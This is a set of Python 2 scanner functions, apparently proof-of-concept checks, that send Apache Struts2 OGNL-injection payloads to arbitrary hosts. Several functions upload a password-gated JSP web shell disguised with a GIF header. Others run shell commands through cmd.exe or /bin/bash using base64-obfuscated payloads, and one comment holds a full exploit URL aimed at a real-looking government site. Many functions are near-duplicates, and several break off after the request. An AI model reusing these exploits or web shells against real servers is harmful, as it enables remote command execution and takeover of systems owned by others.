def verify(self,head='',context='',ip='',port='80',productname={},keywords='',hackinfo=''): target_url = '' target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get('path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' result = {} timeout=3 result['result']=False res=None payload = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()" #print target_url try: headers = {"Content-Type":"application/x-www-form-urlencoded"} if productname.has_key('cookie'): headers['Cookie'] = productname['cookie'] r = requests.post(target_url,data=payload,headers=headers,timeout=5) res_html = r.text except Exception,e: print e return result
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): target_url = '' target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get('path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' result = {} timeout=3 result['result']=False res=None payload = "debug=browser&object=(%23mem=%[email protected]@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789" print target_url try: headers = {"Content-Type":"application/x-www-form-urlencoded"} r = requests.post(target_url,data=payload,headers=headers,timeout=5) res_html = r.text except Exception,e: print e return result
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackresults=''): target_url='' target_url = 'http://' + ip + ':' + port if productname.get('path',''): target_url = 'http://'+ip+':'+port+productname.get('path','') else: from script import linktool listarray=linktool.getaction(target_url) if len(listarray)>0: target_url=listarray[0] else: target_url = 'http://'+ip+':'+port+'/login.action' result = {} timeout=3 result['result']=False res=None # 'redirect:${#req=#context.get(\'co\'+\'m.open\'+\'symphony.xwo\'+\'rk2.disp\'+\'atcher.HttpSer\'+\'vletReq\'+\'uest\'),#resp=#context.get(\'co\'+\'m.open\'+\'symphony.xwo\'+\'rk2.disp\'+\'atcher.HttpSer\'+\'vletRes\'+\'ponse\'),#resp.setCharacterEncoding(\'UTF-8\'),#resp.getWriter().print("web"),#resp.getWriter().print("path88888887:"),#resp.getWriter().print(#req.getSession().getServletContext().getRealPath("/")),#resp.getWriter().flush(),#resp.getWriter().close()}' payload = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22pathstructs12345678:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}" try: headers = {"Content-Type":"application/x-www-form-urlencoded"} r = requests.post(target_url,data=payload,headers=headers,timeout=60) res_html = r.text except Exception,e: print e return result
def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''): target_url = '' target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get( 'path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' result = {} timeout = 3 result['result'] = False res = None payload = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('123456789')).(#o.close())}" print target_url try: headers = {"Content-Type": payload} r = requests.get(target_url, headers=headers, timeout=5) res_html = r.text except Exception, e: print e return result
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): target_url = '' target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get('path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' result = {} timeout=3 result['result']=False res=None payload = "method:%23_memberAccess%[email][email protected][/email]@DEFAULT_MEMBER_ACCESS,%23w%3d%23context.get(%23parameters.rpsobj[0]),%23w.getWriter().println(88888888-1),%23w.getWriter().flush(),%23w.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse" # print target_url try: headers = {"Content-Type":"application/x-www-form-urlencoded"} r = requests.post(target_url,data=payload,headers=headers,timeout=5) res_html = r.text except Exception,e: print e return result
def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackinfo=''): target_url = '' target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get( 'path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' result = {} timeout = 3 result['result'] = False res = None jsp_file = str(random.randint(1000, 1000000)) + '.jsp' content = 'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.' \ 'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2' \ '0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%' \ '29.exec%28request.getParameter%28%22l%22%29%29.getInputStre' \ 'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B' \ '%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt' \ 'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C' \ 'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din' \ '.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20' \ '%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2' \ '0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%' \ '22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E' poc_url = "{url}?method:%23_memberAccess%[email protected]" \ "@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0]," \ "%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a)," \ "%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23" \ "fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23para" \ "meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte" \ "xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23" \ "b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x" \ "x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch" \ "er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch" \ "er.HttpServletResponse&reqobj=%2f&reqobj={filename}&content={" \ "content}".format(url=target_url, filename=jsp_file, content=content) print target_url try: res = urllib2.urlopen(poc_url, timeout=timeout) res_html = res.read() except Exception, e: print e return result
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): target_url = '' target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get('path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' result = {} timeout=3 result['result']=False res=None jsp_file = str(random.randint(1000, 1000000)) + '.jsp' content = 'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.' \ 'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2' \ '0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%' \ '29.exec%28request.getParameter%28%22l%22%29%29.getInputStre' \ 'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B' \ '%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt' \ 'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C' \ 'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din' \ '.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20' \ '%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2' \ '0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%' \ '22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E' poc_url = "{url}?method:%23_memberAccess%[email protected]" \ "@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0]," \ "%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a)," \ "%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23" \ "fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23para" \ "meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte" \ "xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23" \ "b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x" \ "x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch" \ "er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch" \ "er.HttpServletResponse&reqobj=%2f&reqobj={filename}&content={" \ "content}".format(url=target_url, filename=jsp_file, content=content) print target_url try: res=urllib2.urlopen(poc_url,timeout=timeout) res_html = res.read() except Exception,e: print e return result
def verify(self, head='', context='', ip='', port='80', productname={}, keywords='', hackinfo=''): target_url = '' target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get( 'path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' result = {} timeout = 3 result['result'] = False res = None #payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}" command = 'echo test60253718' payload_l = base64.decodestring( u'JXsoI25pa2U9J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZXh0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJlckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1waG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpbD0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2thZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2VzKCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigjY21kPSc=' ) payload_r = base64.decodestring( u'JykuKCNpc3dpbj0oQGphdmEubGFuZy5TeXN0ZW1AZ2V0UHJvcGVydHkoJ29zLm5hbWUnKS50b0xvd2VyQ2FzZSgpLmNvbnRhaW5zKCd3aW4nKSkpLigjY21kcz0oI2lzd2luP3snY21kLmV4ZScsJy9jJywjY21kfTp7Jy9iaW4vYmFzaCcsJy1jJywjY21kfSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwLnJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNvbW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI3JvcykpLigjcm9zLmZsdXNoKCkpfQ==' ) end_null_byte = '0063'.decode('hex') payload = payload_l + command + payload_r + end_null_byte try: headers = {} headers[ 'User-Agent'] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" if productname.has_key('cookie'): headers['Cookie'] = productname['cookie'] files = {'upload': (payload, 'Kaboom', 'text/plain')} r = requests.post(target_url, files=files, headers=headers) res_html = r.content except Exception, e: print e return result
def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackresults=''): target_url = '' target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get( 'path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' result = {} timeout = 3 result['result'] = False res = None s = None try: randint1 = str(random.randint(1000, 10000)) payload = self.make_s2_046_payload('echo X-Test-' + randint1) temp_result = self.exec_s2_046_payload(target_url, payload) if 'X-Test-%s' % (randint1) in temp_result: info = target_url + "struts046 Vul" result['result'] = True result['VerifyInfo'] = {} result['VerifyInfo']['type'] = 'struts046 Vul' result['VerifyInfo']['URL'] = target_url result['VerifyInfo']['payload'] = payload result['VerifyInfo']['result'] = info result['VerifyInfo']['level'] = '高危(HOLE)' return result except Exception, e: print e return result
def verify(self, head='', context='', ip='', port='80', productname={}, keywords='', hackinfo=''): target_url = '' target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get( 'path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' result = {} timeout = 3 result['result'] = False res = None content = str(random.randint(1000, 1000000)) poc_url = "{url}?debug=browser&object=(%23mem=%[email protected]" \ "gnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameter" \ "s.rpsobj[0]].getWriter().println(%23parameters.content[0]):" \ "xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher." \ "HttpServletResponse&content={content}".format(url=target_url, content=content) #print target_url try: req = urllib2.Request(poc_url) if productname.has_key('cookie'): req.add_header('Cookie', productname['cookie']) #res=urllib2.urlopen(poc_url,timeout=timeout) res = urllib2.urlopen(req, timeout=timeout) res_html = res.read() except Exception, e: print e return result
def verify(self, head='', context='', ip='', port='80', productname={}, keywords='', hackinfo=''): target_url = '' target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get( 'path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' result = {} timeout = 3 result['result'] = False res = None payload = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()" #print target_url try: headers = {"Content-Type": "application/x-www-form-urlencoded"} if productname.has_key('cookie'): headers['Cookie'] = productname['cookie'] r = requests.post(target_url, data=payload, headers=headers, timeout=5) res_html = r.text except Exception, e: print e return result
def verify(self, head='', context='', ip='', port='80', productname={}, keywords='', hackinfo=''): target_url = '' target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get( 'path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' result = {} timeout = 3 result['result'] = False res = None payload = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('test'+602+53718)).(#o.close())}" try: headers = {} headers[ 'User-Agent'] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" headers['Content-Type'] = payload if productname.has_key('cookie'): headers['Cookie'] = productname['cookie'] r = requests.get(target_url, headers=headers) res_html = r.content except Exception, e: print e return result
def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): target_url = '' target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get('path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' result = {} timeout=3 result['result']=False res=None s=None try: randint1 = str(random.randint(1000, 10000)) payload = self.make_s2_046_payload('echo X-Test-'+randint1) temp_result = self.exec_s2_046_payload(target_url, payload) if 'X-Test-%s' % (randint1) in temp_result: info = target_url + "struts046 Vul" result['result']=True result['VerifyInfo'] = {} result['VerifyInfo']['type']='struts046 Vul' result['VerifyInfo']['URL'] =target_url result['VerifyInfo']['payload']=payload result['VerifyInfo']['result'] =info return result except Exception,e: print e return result
def verify(self,head='',context='',ip='',port='80',productname={},keywords='',hackinfo=''): target_url = '' target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get('path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' result = {} timeout=3 result['result']=False res=None #payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}" command = 'echo test60253718' payload_l = base64.decodestring(u'JXsoI25pa2U9J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZXh0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJlckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1waG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpbD0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2thZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2VzKCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigjY21kPSc=') payload_r = base64.decodestring(u'JykuKCNpc3dpbj0oQGphdmEubGFuZy5TeXN0ZW1AZ2V0UHJvcGVydHkoJ29zLm5hbWUnKS50b0xvd2VyQ2FzZSgpLmNvbnRhaW5zKCd3aW4nKSkpLigjY21kcz0oI2lzd2luP3snY21kLmV4ZScsJy9jJywjY21kfTp7Jy9iaW4vYmFzaCcsJy1jJywjY21kfSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwLnJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNvbW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI3JvcykpLigjcm9zLmZsdXNoKCkpfQ==') end_null_byte = '0063'.decode('hex') payload = payload_l + command + payload_r + end_null_byte try: headers = {} headers['User-Agent'] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" if productname.has_key('cookie'): headers['Cookie'] = productname['cookie'] files = { 'upload': (payload, 'Kaboom', 'text/plain') } r = requests.post(target_url, files=files, headers=headers) res_html = r.content except Exception,e: print e return result
def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackresults=''): target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get( 'path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' timeout = 3 res = None res_html = None check_url = self.check_vul(target_url) result = {} result['result'] = False try: headers = {"Content-Type": "application/x-www-form-urlencoded"} r = requests.get(check_url, headers=headers, timeout=5) res_html = r.text except Exception, e: print e return result finally:
def verify(self, head='', context='', ip='', port='', productname={}, keywords='', hackresults=''): target_url = '' target_url = 'http://' + ip + ':' + port if productname.get('path', ''): target_url = 'http://' + ip + ':' + port + productname.get( 'path', '') else: from script import linktool listarray = linktool.getaction(target_url) if len(listarray) > 0: target_url = listarray[0] else: target_url = 'http://' + ip + ':' + port + '/login.action' result = {} timeout = 10 result['result'] = False res = None jsp_file = str(random.randint(1000, 1000000)) + '.jsp' # gif89a<% if("024".equals(request.getParameter("pwd"))){ # java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("l")).getInputStream(); # int a = -1; # byte[] b = new byte[2048]; # out.print("<pre>"); # while((a=in.read(b))!=-1){ # out.println(new String(b)); # } # out.print(</pre>"); # } # %> content = 'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.' \ 'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2' \ '0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%' \ '29.exec%28request.getParameter%28%22l%22%29%29.getInputStre' \ 'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B' \ '%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt' \ 'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C' \ 'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din' \ '.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20' \ '%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2' \ '0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%' \ '22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E' poc_url = "{url}?method:%23_memberAccess%[email protected]" \ "@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0]," \ "%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a)," \ "%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23" \ "fos%3dnew:java.io.FileOutputStream(%23b),%23fos.write(%23para" \ "meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte" \ "xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23" \ "b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x" \ "x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch" \ "er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch" \ "er.HttpServletResponse&reqobj=%2f&reqobj={filename}&content={" \ "content}".format(url=target_url, filename=jsp_file, content=content) # 'http://www.dcqjw.gov.cn:80/sflogin_usercenter.action?method:#[email protected]@DEFAULT_MEMBER_ACCESS,#a=#parameters.reqobj[0],#c=#parameters.reqobj[1],#req=#context.get(#a),#b=#req.getRealPath(#c)+#parameters.reqobj[2],#fos=new:java.io.FileOutputStream(#b),#fos.write(#parameters.content[0].getBytes()),#fos.close(),#hh=#context.get(#parameters.rpsobj[0]),#hh.getWriter().println(#b),#hh.getWriter().flush(),#hh.getWriter().close(),1?#xx:#request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=/&reqobj=32203.jsp&content=gif89a<%\n if("024".equals(request.getParameter("pwd"))){\n java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("l")).getInputStream();\n int a = -1;\n byte[] b = new byte[2048];\n out.print("<pre>");\n while((a=in.read(b))!=-1){\n out.println(new String(b));\n }\n out.print("</pre>");\n }\n%>' user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' headers = {'User-Agent': user_agent} # print target_url try: res = urllib2.urlopen(poc_url, timeout=timeout) res_html = res.read() except (IOError, httplib.HTTPException): # print traceback.print_exc() return result finally: if res is not None: res.close() del res if jsp_file in res_html: cprint(target_url + '存在structs2032漏洞', 'red') info = target_url + "struts2032 Vul" result['result'] = True result['VerifyInfo'] = {} result['VerifyInfo']['type'] = 'struts2032 Vul' result['VerifyInfo']['URL'] = target_url result['VerifyInfo']['payload'] = poc_url result['VerifyInfo']['result'] = info result['VerifyInfo']['level'] = '高危(HOLE)' return result return result